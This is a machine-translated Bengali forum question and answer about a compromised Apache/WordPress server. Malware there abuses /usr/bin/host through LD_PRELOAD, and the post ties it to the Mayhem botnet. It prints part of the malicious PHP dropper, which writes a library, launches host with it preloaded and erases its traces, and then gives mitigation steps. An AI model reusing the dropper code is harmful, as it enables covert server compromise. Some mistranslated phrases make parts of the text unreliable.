/ usr / বিন / হোস্ট পিএইচপি স্ক্রিপ্ট দ্বারা চালিত

আজ আমি অ্যাপাচি ওয়েবসারভারে অস্বাভাবিক উচ্চ অনুরোধের হার এবং বেশ উচ্চতর ইনকামিং নেটওয়ার্ক ট্র্যাফিক লক্ষ্য করেছি। এ্যাপাচি এর mod_status পৃষ্ঠা চেক পরে, আমি পথ থেকে হতে আপত্তিকর URL পাওয়া www.server.com/www/wp-includes/js/tinymce/plugins/wpautoresize/। এবং প্রকৃতপক্ষে আমি সেখানে বেশ কয়েকটি হ্যাক (অবরুদ্ধ) পিএইচপি স্ক্রিপ্ট পেয়েছি।

এছাড়াও www-ডেটা ব্যবহারকারী দ্বারা অদ্ভুত প্রক্রিয়া সম্পাদিত লক্ষ্য করা:

www-data  7300 10.8  0.1 2122900 18768 ?       Ssl  Jul11 121:47 /usr/bin/host

চেকিং থেকে /proc/7300/cmdlineপ্রকাশিত হয়েছে যে প্রকৃতপক্ষে এটিই মূল /usr/bin/hostবাইনারি। netstat -anpএতে দেখানো হয়েছে যে এটিতে অনেকগুলি এইচটিটিপি সংযোগ খোলা রয়েছে, সুতরাং কোনওভাবে বাইনারি অপব্যবহার করা হয়। debsumsবাইনারি চেকসাম ঠিক আছে বলে নিশ্চিত করেছে। প্রক্রিয়াটি www- ডেটা ব্যবহারকারীর অধীনে পরিচালিত হওয়ায়, সার্ভার নিজেই আপস হয়েছে বলে বিশ্বাস করার কোনও কারণ আমার ছিল না।

কিভাবে বাইনারি আপত্তি করা হয়?

সম্পাদনা: এটি "আপোষযুক্ত সার্ভারের সাথে কীভাবে আচরণ করবেন" প্রশ্নটি বিস্তৃত নয়। এটি প্রযুক্তিগতভাবে কীভাবে করা হয় তার একটি নির্দিষ্ট ধরণের অপব্যবহার সম্পর্কে বরং একটি প্রশ্ন (এবং ইতিমধ্যে একটি উত্তর), কারণ এটি কীভাবে কাজ করে তাতে এই নির্দিষ্ট ক্ষেত্রেটি বেশ সৃজনশীল। মনে হচ্ছে এটি বেশ কয়েক বছর ধরে বন্য অবস্থায় রয়েছে (২০১২ সালের পুরানো থ্রেড এবং প্রশ্ন) এবং আমি এই সপ্তাহে এটির মুখোমুখি হয়েছি।

অসন্তুষ্ট পিএইচপি স্ক্রিপ্ট এবং গুগলিং ( এই থ্রেড ) এর উত্স কোডগুলি খননের পরে , আমি একটি ব্যাখ্যা পেয়েছি।

এটি system.phpকোডের একটি অংশ যা আমি পেয়েছি:

<?php
// ...
$n = file_put_contents("./libworker.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
// ...

কীভাবে /usr/bin/hostজড়িত তা আরও কিছুটা উন্নত। প্রোগ্রামগুলি .soতাদের কিছু কাজের জন্য গ্রন্থাগার ( ফাইল) ব্যবহার করে। LD_PRELOADএটি কীভাবে কাজ করে তা পরিবর্তন করার জন্য ব্যবহারকারীরা বৈধ বাইনারি চালু করার আগে কিছু .so ফাইল (গুলি) প্রিলিংক করতে পারেন ।

আপনি দেখতে পাচ্ছেন যে এই স্ক্রিপ্টটি একটি ফাইল তৈরি করে libworker.soএবং LD_PRELOADএটিকে প্রিলোড করার জন্য পরিবেশের পরিবর্তনশীল ব্যবহার করে, তাই বৈধ hostবাইনারি সম্পূর্ণ ভিন্ন কিছু করছে doing

এটি একটি 1.shশেল স্ক্রিপ্ট তৈরি করে এবং এটি বিভিন্ন উপায়ে (সরাসরি, atকমান্ড ব্যবহার করে, ক্রোন ব্যবহার করে) চালানোর চেষ্টা করে। এর পরপরই এটি স্ক্রিপ্ট এবং লাইব্রেরি ফাইলটি ডিস্ক থেকে সরিয়ে দেয়, তাই এটি নজরে না যায়।

প্রথম স্থানে যা ঘটেছিল তা হ'ল কিছু দুর্বল ওয়ার্ডপ্রেস প্লাগইন আপত্তিজনক হয়েছে এবং আক্রমণকারী তাদের ফাইলগুলিকে শব্দ-লিখনযোগ্য ডিরেক্টরিতে রাখতে সক্ষম হয়েছিল।

প্রশমনটি হ'ল সেই ডোমেনটির জন্য পুরানো অ্যাক্সেস লগ ফাইলগুলি বিশ্লেষণ করা এবং POSTঅস্বাভাবিক স্থানে কোনও অনুরোধ সন্ধানের চেষ্টা করা - উদাহরণস্বরূপ ডাব্লুপি / জুমলা প্লাগইনের পিএইচপি ফাইলগুলিতে সরাসরি অ্যাক্সেস হওয়া অস্বাভাবিক। তারপরে সমস্ত পাওয়া অপ্রচলিত পিএইচপি ফাইলগুলি সরিয়ে ফেলুন, ডিরেক্টরি অনুমতিগুলি ঠিক করুন, চলমান hostপ্রক্রিয়াগুলি শেষ করুন এবং পুনরায় হ্যাকের কোনও প্রচেষ্টা করার জন্য লগফাইলে নিরীক্ষণ করুন।

সম্পাদনা: আমি ইএসইটি থেকে তথ্য পেয়েছি যে তারা এই নির্দিষ্ট লাইব্রেরি এবং অন্যান্য সংস্করণগুলি ভুল করে সনাক্ত করেছে। অ্যান্টিভাইরাস কোম্পানি এটির নাম দিতে Roopre এবং মনে হচ্ছে যে এটা অংশ হিসাবে ব্যবহার করা হয় মারপিট বটনেট।

মেহেম বোটনেটের গভীর বিশ্লেষণ ।

এই শোষণ গভীর- বিশ্লেষণ ।